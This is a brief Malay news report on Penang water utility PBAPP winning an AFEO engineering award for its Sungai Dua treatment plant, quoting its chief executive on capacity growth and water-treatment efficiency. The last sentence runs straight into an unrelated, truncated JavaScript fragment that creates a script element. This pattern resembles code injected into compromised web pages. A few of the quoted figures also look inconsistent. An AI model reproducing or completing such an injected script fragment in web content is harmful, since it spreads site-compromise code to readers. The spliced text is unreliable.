Gambar : PBAPP
GEORGE TOWN – Perbadanan Bekalan Air Pulau Pinang Sdn. Bhd. (PBAPP) sekali lagi diiktiraf sebagai penerima anugerah berprestij dari Pertubuhan Persekutuan Kejuruteraan Asean (AFEO) pada Persidangan AFEO (CAFEO) Ke-33 di sini baru-baru ini.
Ketua Pegawai Eksekutif PBAPP, Dato’ Ir. Jaseni Maidinsa berkata, PBAPP dipilih berikutan pencapaiannya dalam bidang kejuruteraan perbekalan air di Loji Rawatan Air Sungai Dua (LRA Sungai Dua), Seberang Perai Utara (SPU).
Katanya, LRA Sungai Dua telah menyokong pembangunan sosio-ekonomi negeri selama 41 tahun melalui kejuruteraan rawatan air yang memaksimumkan kapasiti sehingga sembilan kali ganda sejak pembinaannya pada awal 1970- an.
“Dahulu (sekitar tahun 1973) LRA Sungai Dua hanya terdapat sebuah modul rawatan air di sini. Tetapi, kini kita mempunyai lima modul rawatan operasi di kilang.
“Manakala, modul keenam bakal diperluaskan dari 136 juta liter sehari (JL/H) ke 1228 JL/H menjelang awal tahun 2016 nanti,” ujarnya melalui satu kenyataan akhbar di sini baru-baru ini.
Mengulas lanjut, Jaseni memberitahu bahawa PBAPP juga telah meningkatkan kecekapan rawatan perbekalan air sebanyak 530 peratus dengan memperkenalkan keluli tahan karat ‘kepingan’ menggunakan teknologi plat.
“Teknologi ini dapat melanjutkan kitaran penyelenggaraan tangki pemendapan hingga enam bulan berbanding setiap bulan pada tahuntahun sebelum ini sekaligus meningkatan kecekapan pada masa hadapan,” jelas beliau.
Tambahnya, purata pengambilan harian air terawat di Pulau Pinang setiap hari telah meningkat sebanyak 569.62 peratus daripada 142.80 JL/H (1973) kepada 813.42 JL/H (2014).
“Lebih dari 80 peratus air terawat di Pulau Pinang berasal dari loji ini, malah, ia juga telah membantu Pulau Pinang dicatatkan sebagai salah satu daripada margin rizab air terawat paling tinggi di negara ini,” ujar beliau.
Pada majlis yang sama, Jaseni turut menerima Anugerah Kehormat AFEO atas sumbangan beliau selama 30 tahun bersama PBA (Perbadanan Bekalan Air), PBAPP dan PBAHB (PBA Holdings Berhad).var d=document;var s=d.createElement(‘script’);